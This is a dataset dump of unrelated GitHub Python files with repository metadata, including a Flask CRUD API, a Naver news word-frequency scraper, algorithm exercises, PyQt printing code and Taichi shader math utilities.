tools_qt.is_checked(self.dlg, self.dlg.chk_layer_node):\n self.set_user_config()\n 
self.activate_snapping(self.emit_point)\n\n\n def set_user_config(self):\n\n # Disable snapping\n self.snapper_manager.set_snapping_status()\n\n # Set snapping to 'arc', 'node', 'connec' and 'gully'\n self.snapper_manager.set_snapping_layers()\n\n if tools_qt.is_checked(self.dlg, self.dlg.chk_layer_arc):\n self.snapper_manager.config_snap_to_arc()\n\n if tools_qt.is_checked(self.dlg, self.dlg.chk_layer_connec):\n self.snapper_manager.config_snap_to_connec()\n\n if tools_qt.is_checked(self.dlg, self.dlg.chk_layer_node):\n self.snapper_manager.config_snap_to_node()\n\n self.snapper_manager.set_snap_mode()\n\n\n def activate_snapping(self, emit_point):\n\n # Set signals\n self.canvas.xyCoordinates.connect(self.canvas_move_event)\n emit_point.canvasClicked.connect(partial(self.canvas_release_event, emit_point))\n\n\n def canvas_move_event(self, point):\n\n # Get clicked point\n self.vertex_marker.hide()\n event_point = self.snapper_manager.get_event_point(point=point)\n if self.selection_type == SelectionType.ACTIVE:\n result = self.snapper_manager.snap_to_current_layer(event_point)\n elif self.selection_type == SelectionType.ALL:\n result = self.snapper_manager.snap_to_project_config_layers(event_point)\n\n if self.snapper_manager.result_is_valid() and result:\n self.snapper_manager.add_marker(result, self.vertex_marker)\n\n\n def canvas_release_event(self, emit_point, point, btn):\n\n if btn == Qt.RightButton:\n if btn == Qt.RightButton:\n tools_qgis.disconnect_snapping(False, emit_point, self.vertex_marker)\n return\n\n # Get coordinates\n event_point = self.snapper_manager.get_event_point(point=point)\n if self.selection_type == SelectionType.ACTIVE:\n result = self.snapper_manager.snap_to_current_layer(event_point)\n elif self.selection_type == SelectionType.ALL:\n result = self.snapper_manager.snap_to_project_config_layers(event_point)\n if result is None:\n return\n if not result.isValid():\n return\n\n layer = self.snapper_manager.get_snapped_layer(result)\n # Get the point. 
Leave selection\n snapped_feat = self.snapper_manager.get_snapped_feature(result)\n feature_id = self.snapper_manager.get_snapped_feature_id(result)\n snapped_point = self.snapper_manager.get_snapped_point(result)\n layer.select([feature_id])\n self.snapper_manager.restore_snap_options(self.previous_snapping)\n self.deactivate_signals()\n\n\n def deactivate_signals(self):\n\n if self.vertex_marker:\n self.vertex_marker.hide()\n\n try:\n self.canvas.xyCoordinates.disconnect()\n except TypeError:\n pass\n\n try:\n if self.emit_point:\n self.emit_point.canvasClicked.disconnect()\n except TypeError:\n pass\n\n","repo_name":"Giswater/gw_example_plugin","sub_path":"core/toolbars/my_toolbar/my_button_2.py","file_name":"my_button_2.py","file_ext":"py","file_size_in_byte":7531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"32728652772","text":"from flask import Flask\r\nfrom flask import jsonify\r\nfrom flask import request\r\napp = Flask(__name__)\r\nempDB=[\r\n {\r\n 'id':'101',\r\n 'name':'Saravanan S',\r\n 'title':'Technical Leader'\r\n },\r\n {\r\n 'id':'201',\r\n 'name':'Rajkumar P',\r\n 'title':'Sr Software Engineer'\r\n }\r\n ]\r\n@app.route('/empdb/employee',methods=['GET'])\r\ndef getAllEmp():\r\n return jsonify({'emps':empDB})\r\n@app.route('/empdb/employee/',methods=['GET'])\r\ndef getEmp(empId):\r\n usr = [ emp for emp in empDB if (emp['id'] == empId) ] \r\n return jsonify({'emp':usr})\r\n@app.route('/empdb/employee/',methods=['PUT'])\r\ndef updateEmp(empId):\r\n em = [ emp for emp in empDB if (emp['id'] == empId) ]\r\n if 'name' in request.json : \r\n em[0]['name'] = request.json['name']\r\n if 'title' in request.json:\r\n em[0]['title'] = request.json['title']\r\n return jsonify({'emp':em[0]})\r\n@app.route('/empdb/employee',methods=['POST'])\r\ndef createEmp():\r\n dat = {\r\n 'id':request.json['id'],\r\n 'name':request.json['name'],\r\n 'title':request.json['title']\r\n }\r\n empDB.append(dat)\r\n return jsonify(dat)\r\n@app.route('/empdb/employee/',methods=['DELETE'])\r\ndef deleteEmp(empId):\r\n em = [ emp for emp in empDB if (emp['id'] == empId) ]\r\n if len(em) == 0:\r\n abort(404)\r\n empDB.remove(em[0])\r\n return jsonify({'response':'Success'})\r\nif __name__ == '__main__':\r\n app.run()\r\n","repo_name":"srishilesh/Machine-learning","sub_path":"Flask API/Flask_basic.py","file_name":"Flask_basic.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"44"} +{"seq_id":"73987752132","text":"import time\nfrom yogi import tokens\n\n\ndef kmp(strg):\n p = [0 for _ in strg]\n j = -1\n for i in range(len(strg)):\n while j >= 0 and strg[j] != strg[i]:\n if j:\n j = p[j - 1]\n else:\n j = -1\n j += 1\n p[i] = j\n return p\n\n\ndef count_rotations(s, t):\n if len(s) != len(t):\n return 0\n\n n = len(s)\n s2 = s + s\n pattern = t + \"#\" + s2\n lps = kmp(pattern)\n count = 0\n for i in range(n + 1, len(lps)):\n if lps[i] == n:\n count += 1\n\n if s == t:\n return count - 1\n\n return count\n\n\ndef main():\n s, t = [], []\n s.append('abc'*10000)\n t.append('bca'*10000)\n #\n # s.append(\"zqzzqzzqz\")\n # t.append(\"zqzzqzzqz\")\n for i, x in enumerate(tokens(str)):\n if i % 2 == 0:\n s.append(x)\n else:\n t.append(x)\n\n for i in range(len(s)):\n # start = time.time()\n rots = count_rotations(s[i], t[i])\n # end = time.time()\n # print(end-start)\n print(rots)\n\n\nif __name__ == '__main__':\n 
main()\n","repo_name":"j-reber/jutge","sub_path":"string_rotations.py","file_name":"string_rotations.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"30443963053","text":"import sys\nfrom PyQt5 import QtGui\nfrom PyQt5 import QtPrintSupport\nfrom PyQt5 import QtWidgets\n\n\nclass printChart(object):\n\n '''initiates with an image (chart) as the argument'''\n\n def __init__(self, chartimage, landscape=False, parent=None):\n self.parent = parent\n self.image = chartimage\n self.printer = QtPrintSupport.QPrinter()\n if landscape:\n self.printer.setOrientation(QtPrintSupport.QPrinter.Landscape)\n self.printer.setPaperSize(QtPrintSupport.QPrinter.A4)\n\n def sizeToFit(self):\n '''\n make the image fill the page\n '''\n rect = self.printer.pageRect()\n self.image = self.image.scaled(rect.width(), rect.height())\n\n def printpage(self, askfirst=True):\n '''\n print the chart\n '''\n dialog = QtPrintSupport.QPrintDialog(self.printer, self.parent)\n if askfirst and not dialog.exec_():\n return\n\n painter = QtGui.QPainter(self.printer)\n painter.save()\n y = 0\n x = 0\n painter.drawPixmap(x, 0, self.image)\n y += self.image.height()\n painter.restore()\n\n\nif __name__ == \"__main__\":\n app = QtWidgets.QApplication(sys.argv)\n chart = QtGui.QPixmap(\"images/testchart.png\")\n form = printChart(chart)\n form.printpage(True) # show a dialog for testing purposes\n sys.exit(app.exec_())\n","repo_name":"rowinggolfer/openmolar1","sub_path":"src/openmolar/qt4gui/printing/chartPrint.py","file_name":"chartPrint.py","file_ext":"py","file_size_in_byte":1380,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"44"} +{"seq_id":"27017841952","text":"from src.backup_manager.backup_manager import BackupManager\nfrom src.custom_test_case import CustomTestCase\nfrom src.drivers.drivers_provider import DriversProvider\nfrom src.nms_entities.basic_entities.controller import Controller\nfrom src.nms_entities.basic_entities.network import Network\nfrom src.nms_entities.basic_entities.policy import Policy\nfrom src.nms_entities.basic_entities.service import Service\nfrom src.nms_entities.basic_entities.shaper import Shaper\nfrom src.nms_entities.basic_entities.station import Station\nfrom src.nms_entities.basic_entities.teleport import Teleport\nfrom src.nms_entities.basic_entities.vno import Vno\nfrom src.options_providers.options_provider import OptionsProvider\n\noptions_path = 'test_scenarios.backup.load_backup_previous_version'\nbackup_name = 'config_4_0_0_11.txt'\n\n\nclass LoadBackupPreviousVersionCase(CustomTestCase):\n \"\"\"Loading config from previous 4.0.0.11 NMS version. Invalid vars and values should be ignored and config loaded\"\"\"\n\n __author__ = 'dkudryashov'\n __version__ = '4.0.0.21'\n __execution_time__ = None # approximate case execution time in seconds\n __express__ = True\n\n @classmethod\n def set_up_class(cls):\n cls.driver = DriversProvider.get_driver_instance(\n OptionsProvider.get_connection()\n )\n cls.backup = BackupManager()\n\n def test_applying_old_backup(self):\n \"\"\"Obsolete vars and invalid values should be ignored. 
Config is applied using only valid vars and values\"\"\"\n self.backup.apply_backup(backup_name)\n net1 = Network(self.driver, 0, 0)\n net1.load()\n net2 = Network(self.driver, 0, 1)\n net2.load()\n tp1 = Teleport(self.driver, 0, 0)\n tp1.load()\n tp2 = Teleport(self.driver, 0, 1)\n tp2.load()\n ctrl1 = Controller(self.driver, 0, 0)\n ctrl1.load()\n ctrl2 = Controller(self.driver, 0, 1)\n ctrl2.load()\n ctrl3 = Controller(self.driver, 0, 2)\n ctrl3.load()\n ser1 = Service(self.driver, 0, 0)\n ser1.load()\n ser2 = Service(self.driver, 0, 1)\n ser2.load()\n shp1 = Shaper(self.driver, 0, 0)\n shp1.load()\n pol1 = Policy(self.driver, 0, 0)\n pol1.load()\n vno1 = Vno(self.driver, 0, 0)\n vno1.load()\n vno2 = Vno(self.driver, 0, 1)\n vno2.load()\n stn1 = Station(self.driver, 0, 0)\n stn1.load()\n stn2 = Station(self.driver, 0, 1)\n stn2.load()\n stn3 = Station(self.driver, 0, 2)\n stn3.load()\n\n","repo_name":"underdark456/test_system","sub_path":"test_scenarios/backup/load_backup_previous_version/case_load_backup_previous_version.py","file_name":"case_load_backup_previous_version.py","file_ext":"py","file_size_in_byte":2544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"28052671329","text":"\n# 네이버 뉴스 IT/과학 부분 최근 30일간 가장 많이나온 단어 상위 30개\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom bs4 import BeautifulSoup as bs\nimport requests\nfrom collections import Counter\nimport matplotlib\nfrom matplotlib import font_manager\nfrom datetime import date, timedelta\nfrom konlpy.tag import Okt\nfrom multiprocessing import Pool, Manager\nimport time\nimport sys\nimport os\n\nfont_location = \"C:/Windows/Fonts/malgun.ttf\"\nfont_name = font_manager.FontProperties(fname=font_location).get_name()\nmatplotlib.rc('font', family=font_name)\nmatplotlib.rcParams['axes.unicode_minus'] = False\nmatplotlib.rcParams['figure.figsize'] = (12, 6)\n\ntry:\n os.chdir(sys._MEIPASS)\n print(sys._MEIPASS)\nexcept:\n os.chdir(os.getcwd())\n\nokt = Okt()\nstopwords = []\n\nwith open('.\\\\stopword.txt', 'r', encoding=\"UTF8\") as file:\n stopwords = file.readlines()\n for index, word in enumerate(stopwords):\n stopwords[index] = word.replace('\\n', '')\n print(\"stopword 읽기끝\")\n\n\ndef multireplaceEmpty(strData, replacewords):\n for word in list(replacewords):\n strData = strData.replace(word, '')\n return strData\n\n\ndef multiwordreplaceEmpty(strData):\n for word in stopwords:\n if(word == strData):\n strData = strData.replace(word, '')\n return strData\n\n\ndef StringSplit(strData):\n words = okt.nouns(strData)\n # words = strData.split(' ')\n result = []\n for word in words:\n temp = multireplaceEmpty(\n word, '\\',\\\".·/<>}{][;:?!\\r\\n\\t“‘’”…#-`()\\u2028®')\n temp = multiwordreplaceEmpty(\n temp)\n if(temp != ''):\n result.append(temp)\n\n return result\n\n\ndef paging(sid, date, number):\n url = f'https://news.naver.com/main/list.nhn?mode=LS2D&mid=shm&sid2={sid}&sid1=105&date={date}&page={number}'\n res = requests.get(url, headers={'User-Agent': 'Mozilla/5.0'}).text\n soup = bs(res, \"html.parser\")\n pages = soup.select('.paging > a')\n pagelist = []\n for page in pages:\n if(page.get_text() == '다음'):\n return paging(sid, date, number+10)\n pagelist.append(page.get_text())\n\n if(pagelist == []):\n return 1\n if(pagelist[-1] == '이전'):\n return number\n return pagelist[-1]\n\n\ndays = 0\n\nif len(sys.argv) != 2:\n days = 1\nelse:\n if(sys.argv[1].isdecimal()):\n days = int(sys.argv[1])\n else:\n days = 1\n\n\nsids = [731, 226, 227, 230, 732, 
283, 229, 228]\ngroup = {731: '모바일', 226: '인터넷SNS', 227: '통신뉴미디어', 230: 'IT일반',\n 732: '보안해킹', 283: '컴퓨터', 229: '게임리뷰', 228: '과학일반'}\ntoday = date.today()\n\n\ndef News_title_dict(*args):\n dic = args[0][0]\n sid = args[0][1]\n sei = []\n for i in range(days):\n DateData = (today - timedelta(days=i)).isoformat().replace('-', '')\n print(f'sid = {sid}, Date = {DateData} Point')\n\n for page in range(1, int(paging(sid, DateData, 1))+1):\n url = f'https://news.naver.com/main/list.nhn?mode=LS2D&mid=shm&sid2={sid}&sid1=105&date={DateData}&page={page}'\n res = requests.get(url, headers={'User-Agent': 'Mozilla/5.0'}).text\n soup = bs(res, \"html.parser\")\n list_title = soup.select('#main_content li a')\n print(f'{page}번 페이지 검색 Point')\n for title in list_title:\n sei.extend(StringSplit(title.get_text()))\n dic[sid] = sei\n\n\nif __name__ == '__main__':\n manager = Manager()\n dic = manager.dict()\n diclist = []\n for sid in sids:\n diclist.append((dic, sid))\n\n # print(str(diclist))\n\n startTime = time.time()\n pool = Pool(processes=4)\n pool.map(News_title_dict, iterable=diclist)\n print(\n f\"-------------------------{round(time.time() - startTime,2)}초-------------------------\")\n\n DFdatas = {}\n for key, value in dic.items():\n DFdatas[key] = pd.DataFrame(\n pd.Series(Counter(value)), columns=['count'])\n\n excel_writer = pd.ExcelWriter(\n u'네이버뉴스_IT_과학_제목_단어수.xlsx', engine='xlsxwriter')\n i = 0\n for key, value in DFdatas.items():\n DFdata = value.sort_values(['count'], ascending=False)\n DFdata.to_excel(excel_writer, index=True,\n sheet_name=f'분류 {group[key]}')\n topDFdata = DFdata.head(30)\n topDFdata.to_excel(excel_writer, index=True,\n sheet_name=f'분류 {group[key]} 상위30개 단어들')\n topDFdata.sort_values(['count']).plot(kind='barh')\n plt.title(f'{group[key]}뉴스 최근 {days}일간 가장 많이 나온 단어 상위 30개')\n i = i+1\n\n excel_writer.save()\n plt.show()\n","repo_name":"ttn218/NevernewTitlewords","sub_path":"BigDataProject.py","file_name":"BigDataProject.py","file_ext":"py","file_size_in_byte":4734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"11158126503","text":"import pytest\nfrom solutions.sol_63 import Solution\n\ncases = [\n {\n \"input\": {\n \"obstacle_grid\": [[0, 0, 0], [0, 1, 0], [0, 0, 0]],\n },\n \"output\": 2,\n },\n {\n \"input\": {\n \"obstacle_grid\": [[0, 1], [0, 0]],\n },\n \"output\": 1,\n },\n]\n\n\n@pytest.mark.sol63\ndef test_run():\n for case in cases:\n assert (\n Solution.unique_paths_with_obstacles(\n obstacle_grid=case[\"input\"][\"obstacle_grid\"],\n )\n == case[\"output\"]\n )\n","repo_name":"Scalas/PS_LeetCode","sub_path":"test_solutions/test_63.py","file_name":"test_63.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"22307877737","text":"def is_even(number):\n \"\"\"Check if number is even.\n\n Args:\n number (int): Any integer\n\n Returns:\n bool: if the number modulus 2 equal zero, it returns true , otherwise it returns false.\n \"\"\"\n return number % 2 == 0\n\n\ndef check_number(number):\n \"\"\"Takes a number and iterates it based on the collatz pattern.\n\n Args:\n number (int): a positive integer\n\n Returns:\n int: the result of the collatz process\n \"\"\"\n if is_even(number):\n number = number // 2\n else:\n number = 3 * number + 1\n\n return number\n\n\ndef collatz(number):\n \"\"\"Takes a number and loops until it equals 1.\n\n Args:\n number (int): a positive integer\n \"\"\"\n\n while 
number != 1:\n print(number)\n number = check_number(number)\n print(\"Final number is: \" + str(number))\n\n\nif __name__ == \"__main__\":\n user_input = abs(int(input(\"Enter a number:\")))\n collatz(user_input)\n","repo_name":"bnice5000/OPSC-540","sub_path":"week-2/collatz.py","file_name":"collatz.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"33291389924","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Dec 12 13:00:22 2019\n\n@author: dennis\n\nBuild video with:\n ffmpeg -framerate 60 -pattern_type glob -i '*.png' -c:v libx264 -pix_fmt yuv420p orbits.mp4\n\"\"\"\n\nfrom physics import Body, OrbitalSystem\nimport numpy as np\nimport re\n\nplanet_names = ('io', 'ganymede', 'europa', 'callisto')\nbodies = []\nwith open('data/input.txt', 'r') as f:\n for i, line in enumerate(f.readlines()):\n x, y, z = [int(x) for x in re.findall(r'-?\\d+', line)]\n bodies.append(Body(x, y, z, planet_names[i]))\n\nsystem = OrbitalSystem(bodies, draw_flag=True, record_flag=True)\n#while not system.solved:\nwhile system.steps < 1001:\n system.step()\n\nprint('Part 1:', system.energies[1000+2])\n#print('Part 2:', np.lcm(np.lcm(system.solutions['x'], system.solutions['y']), system.solutions['z']))\n","repo_name":"dennissv/aoc-bit","sub_path":"day-12/dennis.py","file_name":"dennis.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"22179317432","text":"'''\n编写一个高效的算法来判断 m x n 矩阵中,是否存在一个目标值。该矩阵具有如下特性:\n\n每行中的整数从左到右按升序排列。\n每行的第一个整数大于前一行的最后一个整数。\n示例 1:\n\n输入:\nmatrix = [\n [1, 3, 5, 7],\n [10, 11, 16, 20],\n [23, 30, 34, 50]\n]\ntarget = 3\n输出: true\n示例 2:\n\n输入:\nmatrix = [\n [1, 3, 5, 7],\n [10, 11, 16, 20],\n [23, 30, 34, 50]\n]\ntarget = 13\n输出: false\n\n链接:https://leetcode-cn.com/problems/search-a-2d-matrix\n'''\nfrom typing import List\n\n\nclass Solution:\n def searchMatrix(self, matrix: List[List[int]], target: int) -> bool:\n if not matrix:\n return False\n row = len(matrix)\n col = len(matrix[0])\n left = 0\n right = row * col\n while left < right:\n mid = left + (right - left) // 2\n if matrix[mid // col][mid % col] < target:\n left = mid + 1\n else:\n right = mid\n # print(left,right)\n return left < row * col and matrix[left // col][left % col] == target\n\n\n# 自己的版本\nclass Solution:\n def searchMatrix(self, matrix: List[List[int]], target: int) -> bool:\n # 二分\n if matrix is None or len(matrix) == 0 or matrix[0] is None or len(matrix[0]) == 0:\n return False\n row = len(matrix)\n col = len(matrix[0])\n left = 0\n right = row * col - 1\n while left + 1 < right:\n mid = left + (right - left) // 2\n # 一般来说 // 是区间, % 是余数: 即 //可以表示行,%表示列\n if matrix[mid // col][mid % col] < target:\n left = mid\n elif matrix[mid // col][mid % col] > target:\n right = mid\n else:\n return True\n if matrix[left // col][left % col] == target:\n return True\n elif matrix[right // col][right % col] == target:\n return True\n else:\n return False\n","repo_name":"huhudaya/leetcode-","sub_path":"LeetCode/074. 搜索二维矩阵(二维变成一维,二分).py","file_name":"074. 
搜索二维矩阵(二维变成一维,二分).py","file_ext":"py","file_size_in_byte":2036,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"331519417","text":"import taichi as ti\r\nimport math\r\n\r\n# %% type shortcuts\r\n\r\nvec2 = ti.types.vector(2, ti.f32)\r\nvec3 = ti.types.vector(3, ti.f32)\r\nvec4 = ti.types.vector(4, ti.f32)\r\nvec5 = ti.types.vector(5, ti.f32)\r\nvec6 = ti.types.vector(6, ti.f32)\r\nvec7 = ti.types.vector(7, ti.f32)\r\nvec8 = ti.types.vector(8, ti.f32)\r\nvec9 = ti.types.vector(9, ti.f32)\r\nvec10 = ti.types.vector(10, ti.f32)\r\nvec11 = ti.types.vector(11, ti.f32)\r\nvec12 = ti.types.vector(12, ti.f32)\r\nvec13 = ti.types.vector(13, ti.f32)\r\nvec14 = ti.types.vector(14, ti.f32)\r\nvec15 = ti.types.vector(15, ti.f32)\r\nvec16 = ti.types.vector(16, ti.f32)\r\n\r\nmat2 = ti.types.matrix(2, 2, ti.f32)\r\nmat3 = ti.types.matrix(3, 3, ti.f32)\r\nmat4 = ti.types.matrix(4, 4, ti.f32)\r\n\r\n\r\ntmpl = ti.template()\r\n# %% constants\r\n\r\ntwopi = 2 * math.pi\r\npi180 = math.pi / 180.\r\n\r\n# %% shader language functions\r\n\r\n\r\n@ti.func\r\ndef length(p):\r\n \"\"\"\r\n :param p: vector\r\n :return ti.sqrt(p.dot(p)): length of the vector p\r\n \"\"\"\r\n return ti.sqrt(p.dot(p))\r\n\r\n\r\n@ti.func\r\ndef normalize(p):\r\n \"\"\"\r\n :param p: vector\r\n :return normalised vector p\r\n \"\"\"\r\n n = p.norm()\r\n return p / (n if n != 0. else 1.)\r\n\r\n\r\n@ti.func\r\ndef mix(x, y, a):\r\n \"\"\"\r\n :param x: vector\r\n :param y: vector\r\n :param a: coefficient of mixing\r\n :return x * (1. - a) + y * a: resulting mixing vector\r\n \"\"\"\r\n return x * (1. - a) + y * a\r\n\r\n\r\n@ti.func\r\ndef dot(p, q):\r\n \"\"\"\r\n :param p: vector\r\n :param q: vector\r\n :return p.dot(q): scalar multiplication of p and q\r\n \"\"\"\r\n return p.dot(q)\r\n\r\n\r\n@ti.func\r\ndef dot2(p):\r\n \"\"\"\r\n :param p: vector\r\n :return p.dot(p): scalar multiplication of p and p\r\n \"\"\"\r\n return p.dot(p)\r\n\r\n\r\n@ti.func\r\ndef cross(x, y):\r\n \"\"\"\r\n :param x: vector\r\n :param y: vector\r\n :return: a vector perpendicular to both x and y\r\n \"\"\"\r\n return vec3(x[1] * y[2] - y[1] * x[2],\r\n x[2] * y[0] - y[2] * x[0],\r\n x[0] * y[1] - y[0] * x[1])\r\n\r\n\r\n@ti.func\r\ndef reflect(rd, n): # rd: vec3, n: vec3\r\n \"\"\"\r\n Reflects incident vector rd using surface normal n\r\n :param rd: vec3, ray\r\n :param n: vec3, normal\r\n :return: vec3, reflected ray\r\n \"\"\"\r\n # https: // www.khronos.org / registry / OpenGL - Refpages / gl4 / html / reflect.xhtml\r\n\r\n return rd - 2.0 * dot(n, rd) * n\r\n\r\n\r\n@ti.func\r\ndef deg2rad(a):\r\n \"\"\"\r\n :param a: angle in degrees\r\n :return: angle `a` in radians\r\n \"\"\"\r\n return a * pi180\r\n\r\n\r\n@ti.func\r\ndef rot(a):\r\n \"\"\"\r\n :param a: angle of the rotation in rad\r\n :return mat2([[c, -s], [s, c]]): matrix of the rotation in a 2-dim space\r\n \"\"\"\r\n c = ti.cos(a)\r\n s = ti.sin(a)\r\n return mat2([[c, -s], [s, c]])\r\n\r\n\r\n@ti.func\r\ndef rot_y(a):\r\n \"\"\"\r\n :param a: angle of the rotation relatively to axis y in rad\r\n :return: matrix of the rotation\r\n \"\"\"\r\n c = ti.cos(a)\r\n s = ti.sin(a)\r\n return mat3([[c, 0, -s],\r\n [0, 1, 0],\r\n [s, 0, c]])\r\n\r\n\r\n@ti.func\r\ndef rot_x(a):\r\n \"\"\"\r\n :param a: angle of the rotation relatively to axis x in rad\r\n :return: matrix of the rotation\r\n \"\"\"\r\n c = ti.cos(a)\r\n s = ti.sin(a)\r\n return mat3([[1, 0, 0],\r\n [0, c, -s],\r\n [0, s, c]])\r\n\r\n\r\n@ti.func\r\ndef rot_z(a):\r\n 
\"\"\"\r\n :param a: angle of the rotation relatively to axis z in rad\r\n :return: matrix of the rotation\r\n \"\"\"\r\n c = ti.cos(a)\r\n s = ti.sin(a)\r\n return mat3([[c, -s, 0],\r\n [s, c, 0],\r\n [0, 0, 1]])\r\n\r\n@ti.func\r\ndef sign(x: ti.f32):\r\n \"\"\"\r\n :param x: ti.f32: a number\r\n :return: sign of x\r\n \"\"\"\r\n return 1. if x > 0. else -1. if x < 0. else 0.\r\n\r\n\r\n@ti.func\r\ndef signv(x: tmpl):\r\n \"\"\"\r\n :param x: set of numbers\r\n :return: r: set of signs of x\r\n \"\"\"\r\n r = ti.Vector(x.shape[0], x.dtype)\r\n for i in ti.static(range(x.shape[0])):\r\n r[i] = sign(x[i])\r\n return r\r\n\r\n\r\n@ti.func\r\ndef clamp(x, low, high):\r\n \"\"\"\r\n :param x: a number\r\n :param low: a low border of diapason\r\n :param high: a high border of diapason\r\n :return: x if low < x < high or one of the borders\r\n \"\"\"\r\n return ti.max(ti.min(x, high), low)\r\n\r\n\r\n@ti.func\r\ndef fract(x):\r\n \"\"\" returns fractional part of the inserted number\r\n :param\r\n x: inserted number\r\n :returns\r\n x - ti.floor(x): fractional part of the inserted number\r\n \"\"\"\r\n return x - ti.floor(x)\r\n\r\n\r\n@ti.func\r\ndef step(edge, x):\r\n \"\"\"\r\n :param edge: a number\r\n :param x: a number\r\n :return: 0. if x < edge else 1.\r\n \"\"\"\r\n return 0. if x < edge else 1.\r\n\r\n\r\n@ti.func\r\ndef smoothstep(edge0, edge1, x):\r\n \"\"\"\r\n :param edge0: a number\r\n :param edge1: a number\r\n :param x: a number\r\n :return: 0. if x < edge else 1.\r\n \"\"\"\r\n n = (x - edge0) / (edge1 - edge0)\r\n t = clamp(n, 0.0, 1.0)\r\n return t * t * (3.0 - 2.0 * t)\r\n\r\n\r\n@ti.func\r\ndef smoothmin(a, b, k):\r\n \"\"\"\r\n Returns smoothmin\r\n :param a: float, first any number\r\n :param b: float, second any number\r\n :param k: float, coefficient\r\n :return: float, smoothmin between a and b\r\n \"\"\"\r\n h = max(k - abs(a - b), 0.) / k\r\n return min(a, b) - h * h * k * (1./4.)\r\n\r\n\r\n@ti.func\r\ndef smoothmax(a, b, k):\r\n \"\"\"\r\n Returns smoothmax\r\n :param a: float, first any number\r\n :param b: float, second any number\r\n :param k: float, coefficient\r\n :return: float, smoothmax between a and b\r\n \"\"\"\r\n return smoothmin(a, b, -k)\r\n\r\n\r\n@ti.func\r\ndef smoothmin3(a, b, k):\r\n \"\"\"\r\n Returns cubic smoothmin\r\n :param a: float, first any number\r\n :param b: float, second any number\r\n :param k: float, coefficient\r\n :return: float, cubic smoothmin between a and b\r\n \"\"\"\r\n h = max(k - abs(a - b), 0.) / k\r\n return min(a, b) - h * h * h * k * (1./6.)\r\n\r\n\r\n@ti.func\r\ndef skewsin(x, t):\r\n \"\"\"\r\n Returns skewed sin(x)\r\n :param x: ti.f32, angle in radians\r\n :param t: coefficient of skewing\r\n :return: ti.f32, skewed sin(x)\r\n \"\"\"\r\n return ti.atan2(t * ti.sin(x), (1. 
- t * ti.cos(x))) / t\r\n\r\n#%% PRNG\r\n\r\n@ti.func\r\ndef random2():\r\n \"\"\"\r\n Generates random vec2\r\n :return: vec2, random vector\r\n \"\"\"\r\n return vec2(ti.random(ti.f32), ti.random(ti.f32))\r\n\r\n\r\n@ti.func\r\ndef hash1(n):\r\n \"\"\"\r\n Generates pseudo-random number\r\n :param n: ti.f32, any number\r\n :return: ti.f32, number in [0,1]\r\n \"\"\"\r\n return fract(ti.sin(n) * 43758.5453)\r\n\r\n\r\n@ti.func\r\ndef hash21(p):\r\n \"\"\"\r\n Generates pseudo-random number based on vec2 p\r\n :param p: vec2, any vector\r\n :return: ti.f32, number in [0,1]\r\n \"\"\"\r\n q = fract(p * vec2(123.34, 345.56))\r\n q += dot(q, q + 34.23)\r\n return fract(q.x * q.y)\r\n\r\n@ti.func\r\ndef hash31(p):\r\n \"\"\"\r\n Generates pseudo-random number based on vec3 p\r\n :param p: vec3, any vector\r\n :return: ti.f32, number in [0,1]\r\n \"\"\"\r\n q = fract(p * vec3(123.34, 345.56, 567.78))\r\n q += dot(q, q + 34.23)\r\n return fract(q.x * q.y * q.z)\r\n\r\n\r\n@ti.func\r\ndef hash22(p):\r\n \"\"\"\r\n Generates pseudo-random vec2 based on vec2 p\r\n :param p: vec2, any vector\r\n :return: vec2, coordinates are in [0,1]\r\n \"\"\"\r\n x = hash21(p)\r\n y = hash21(p + x)\r\n return vec2(x, y)\r\n\r\n\r\n@ti.func\r\ndef hash33(p):\r\n \"\"\"\r\n Generates pseudo-random vec3 based on vec2 p\r\n :param p: vec2, any vector\r\n :return: vec3, coordinates are in [0,1]\r\n \"\"\"\r\n x = hash31(p)\r\n y = hash31(p + x)\r\n z = hash31(p + x + y)\r\n return vec3(x, y, z)\r\n\r\n\r\n# https://www.shadertoy.com/view/ll2GD3\r\n@ti.func\r\ndef pal(t, a, b, c, d):\r\n \"\"\"\r\n Returns palette-colored image\r\n :param t: ti.f32, normalized palette index\r\n :param a: ti.f32, coefficient of scale\r\n :param b: ti.f32, coefficient of biasion\r\n :param c: ti.f32, coefficient of oscillation\r\n :param d: ti.f32, coefficient of phase\r\n :return: color\r\n \"\"\"\r\n return a + b * ti.cos(twopi * (c * t + d))\r\n\r\n#%% SDF 2D\r\n\r\n\r\n@ti.func\r\ndef sd_circle(p, r): # == sd_sphere\r\n \"\"\"sdf for circle\r\n :param p: vec2, coord of the center of sphere\r\n :param r: ti.f32, radius\r\n :return p.norm() - r: sdf for sphere\r\n \"\"\"\r\n return p.norm() - r\r\n\r\n\r\n@ti.func\r\ndef sd_segment(p, a, b): # same for 3D\r\n \"\"\"\r\nSDF for segment\r\n :param p: vec3, point of the center\r\n :param a: vec3\r\n :param b: vec3\r\n :return: sdf for segment\r\n \"\"\"\r\n pa = p - a\r\n ba = b - a\r\n h = clamp(dot(pa, ba) / dot2(ba), 0.0, 1.0)\r\n return (pa - ba * h).norm()\r\n\r\n\r\n@ti.func\r\ndef sd_box(p, b): # same for 3D\r\n \"\"\"\r\n SDF for box\r\n :param p: vec3 (vec2), point of the center\r\n :param b: ti.f32, half of the length of box\r\n :return: ti.f32, sdf for box\r\n \"\"\"\r\n d = abs(p) - b\r\n return 